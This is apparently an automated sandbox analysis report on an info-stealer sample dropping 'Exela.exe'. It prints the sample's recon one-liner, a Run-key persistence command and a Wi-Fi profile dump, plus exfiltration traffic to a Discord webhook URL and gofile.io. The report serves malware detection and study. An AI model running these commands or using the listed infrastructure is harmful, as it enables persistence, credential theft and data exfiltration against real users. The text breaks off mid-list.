            Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7516, ProcessName: HOSTNAME.EXE
            Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ParentProcessId: 6816, ParentProcessName: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup adminis
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7596, ProcessName: svchost.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f", CommandLine: C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ParentProcessId: 6816, ParentProcessName: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f", ProcessId: 1076, ProcessName: cmd.exe

            Stealing of Sensitive Information

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ParentProcessId: 6816, ParentProcessName: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 7232, ProcessName: cmd.exe
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeAvira: detected
            Source: https://raw.githubusercontent.com/justforExela/injection/main/injection.jsAvira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeAvira: detection malicious, Label: HEUR/AGEN.1306040
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeReversingLabs: Detection: 39%
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeJoe Sandbox ML: detected
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeJoe Sandbox ML: detected

            Phishing

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: crypto\engine\tb_digest.cENGINE_get_digestcrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancrypto\packet.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: Binary string: tRSA_PRIME_INFOeqdmp1dmq1iqmpprime_infosRSAPrivateKeyRSAPublicKeyhashAlgorithmmaskGenAlgorithmsaltLengthtrailerFieldRSA_PSS_PARAMShashFuncmaskGenFuncpSourceFuncRSA_OAEP_PARAMScompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.2.1built on: Fri Feb 23 00:13:44 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-csg7dlje\src\rust\target\release\deps\cryptography_rust.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986952157.000002DCCEDE0000.00000002.00000001.01000000.00000006.sdmp, Exela.exe, 00000051.00000003.1831588046.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650799388.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1803607087.0000023B784A2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-csg7dlje\src\rust\target\release\deps\cryptography_rust.pdbo source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp

            Spreading

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF72AA8842C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA78AF0 FindFirstFileExW,FindClose,0_2_00007FF72AA78AF0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA924C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF72AA924C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF72AA8842C
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,81_2_00007FF6E3A7842C
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A68AF0 FindFirstFileExW,FindClose,81_2_00007FF6E3A68AF0
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A824C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,81_2_00007FF6E3A824C4
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,81_2_00007FF6E3A7842C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior

            Networking

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
            Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
            Source: unknownDNS query: name: ip-api.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.3
            Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.3
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: discord.com
            Source: global trafficDNS traffic detected: DNS query: api.gofile.io
            Source: global trafficDNS traffic detected: DNS query: store8.gofile.io
            Source: unknownHTTP traffic detected: POST /api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY0 HTTP/1.1Host: discord.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.3Content-Length: 1381
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 17:24:19 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=7bd0627c025f11efa7d31a4199c9fe48; Expires=Mon, 23-Apr-2029 17:24:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1713979460x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fODZtPEW%2BMTNE%2BaVAjSqZSYXk1o3MBVDJIR7Nwuw2Hs3icT1kmLI%2F%2FoNzv7BLn8yylT04AkpCEqTHQhlfmk4Z8a0EUMSuZY3gnxp08DLvQHs5EAGZCb8x5Q2Gm2r"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=7bd0627c025f11efa7d31a4199c9fe48c4f5e57f9711b81ede957149357073dc7775ed4571b99598883e1a480d310fd4; Expires=Mon, 23-Apr-2029 17:24:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=22bfe7b5e874aa62114a8089515824a77160f218-1713979459; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 17:24:20 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=7c49fd12025f11efbdd8ee7b659d56a8; Expires=Mon, 23-Apr-2029 17:24:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1713979461x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d13Kl274CV7G76C%2Ft8Na4Gy%2Fhu6x4Cje3c0er8fa6KYbZLuuBMjuobnDEek3ZJ4eq91RxNxYVn3xnNSMGmxve6lZQKNl%2BUFBC8jkdp4Ob4ouxwLztCV0MLHH0zER"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=7c49fd12025f11efbdd8ee7b659d56a8d44545b7b642815a6a554183e4e71fc97bf076171c2e94722355f6e2d4d6f95a; Expires=Mon, 23-Apr-2029 17:24:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=0f8d95718fc85af237794a7b11ac27ff3aa11215-1713979460; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 17:24:21 GMTContent-Type: application/jsonContent-Length: 45Connection: closestrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1713979463x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8Ey646mwNRy1SWKeH6xTZtK15gcdbjSssffHYufv5o%2FsoLMY7RBfTafqs9uXabQkf1jSDu6EpHDpxWSBV%2BK0L58QN01rubBeGE7s52Q7zsk1xkYcl7RhY%2BTvRgR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8797c94d8fe809f3-LAS
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 17:24:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=81608906025f11efb039be452c0845c9; Expires=Mon, 23-Apr-2029 17:24:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1713979470x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pyMWczbleQALJS%2BMQCD44S9SoXDnwVNjYlOGYcGpHbcPsbt3ugBUdVdoWGwQ57MMKdlAbt9Moc4yO9Fxd%2By6lynJefgXGXeHaUfp1xw3FQKDIB1uhHcM8kChF%2F8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=81608906025f11efb039be452c0845c9902407b9c63a87615a9b24dbfd4ff0121e3e8bb9ff0365232310f373b2ba71f9; Expires=Mon, 23-Apr-2029 17:24:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=418df2eda9f10ccb09d5126301cea6bca0418ed5-1713979468; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 